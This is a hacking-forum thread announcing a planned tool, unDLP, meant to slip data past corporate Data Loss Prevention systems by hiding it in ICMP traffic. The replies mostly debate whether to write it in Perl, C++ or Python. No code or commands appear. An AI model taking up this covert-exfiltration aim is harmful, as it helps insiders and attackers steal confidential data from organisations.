[unDLP] Presentation

hacking
steganography
linux
tool

#1

Hi fellas,

As @_py suggested, I have decided to adopt a new article format to show the progress of my project, allowing you to have a better understanding of the technical choices during the development process as well as a better overview of the work accomplished.

This new series concerns a new open source project known as unDLP.

Context

As you probably already know, industrial spying cost millions of dollars to companies every year through data exfiltration, data stealing, etc. In order to protect themselves against this bane, companies invested into DLP technologies, allowing to protect sensitive information from hackers and malicious employees. A few existing solutions allow bypassing such security measures. However, none of them are flawless, discrete, or efficient enough to guarantee success. That is why unDLP was born.

DLP

Firstly, let me introduce the concept of DLP (Data Loss Protection). DLP technologies help to protect sensitive information by detecting potential data leakage at several points of failure:

  • The network
  • The end user machine (USB data transfers, emails, etc.)
  • Instant messaging software
  • Multiple services (FTP, etc.)

Once an alert is triggered, and according to its level of severity, the DLP in place warns the user and displays a preventative message (indicating that the information seized is confidential) or simply blocks the current user.

DLPs are quite similar to anti-virus software and use the same detection methods such as regular expressions, hashes, and signatures. Indeed, during the configuration phase, the DLP software will classify any critical data, allowing it to detect suspicious activities. Moreover, they implement standard regexs in order to detect the transfer of personal information like credit card or bank account numbers.

However, despite the large coverage of these technologies, they are incapable of detecting data exfiltration through steganography and this is the flaw exploited by unDLP.

unDLP

Objective

Discreetly exfiltrate information via the ICMP protocol.

Architecture

unDLP will follow a standard client-server architecture, allowing to easily retrieve the exfiltrated data.

Language

unDLP will certainly be developed in Perl. But why Perl?

First, I never created a tool of such scale with Perl. Second, it is quite easy to convert a Perl script to a Windows executable. Finally, the most important criteria, it sounds fun! :joy:

Features

  • Data encryption
  • Public key retrieval
  • Transfer speed

Conclusion

Keep in mind that this project is still just an idea and that the development process has not started yet so any feedback or ideas are welcome.

I hope you enjoyed this reading.

Best,
Nitrax


[unDLP] The joys of pivoting
(Not a N00b, but still learning) #2

What are the benefits of Perl over C++? I think it would be easier to integrate/port into existing projects if you write it in C++, wouldn’t it?

Best,
SmartOne
P.S.: I could be wrong though, because I don’t have a lot of experience with Perl :slight_smile:


#3

Sounds like a great idea! Can’t wait to see your implementation.


(oaktree) #4

Will it be on GitLab?


#5

you better write it in python so I can contribute


#6

It will be, for sure, easier to maintain a C++ code base and it will clearly simplify its integration within another engine / software. However, I would like to keep unDLP independent and, frankly, I don’t care about a possible merge or integration with another structure. :smile:

Develop this project with PERL is for me an occasion to improve my skills and knowledge in PERL development :stuck_out_tongue:

Moreover, PERL provides a decent number of low level network libraries that can be useful :wink:


#7

Nop, on my github :stuck_out_tongue:


(oaktree) #8

Why not learn PERL to contribute?


#9

I waited for such comment from you :joy:

@oaktree is right ! Go outside your comfort zones !


#10

I’m glad you took my advice into consideration! Perl is bae so I’ll definitely have a look at your code once I have some free time.


(pico) #11

The main benefit is that Perl is the coolest scripting language ever :wink:

On top of that, it is very easy to integrate a Perl interpreter in any other project and it has a quite powerful extension system to interface to any other library out there (man perlembed and man perlxstut for details).

P.S.: It is Perl not PERL

http://perldoc.perl.org/perlfaq1.html#What's-the-difference-between-"perl"-and-"Perl"%3F


(Not a N00b, but still learning) #12

Interesting to learn about the naming difference . Had never heard of that before :joy:


#13

Cheers mate

Always a relevant comment ! I will fix that. Thanks for sharing.


#14

I’ll keep reading when you update your series! Sounds promising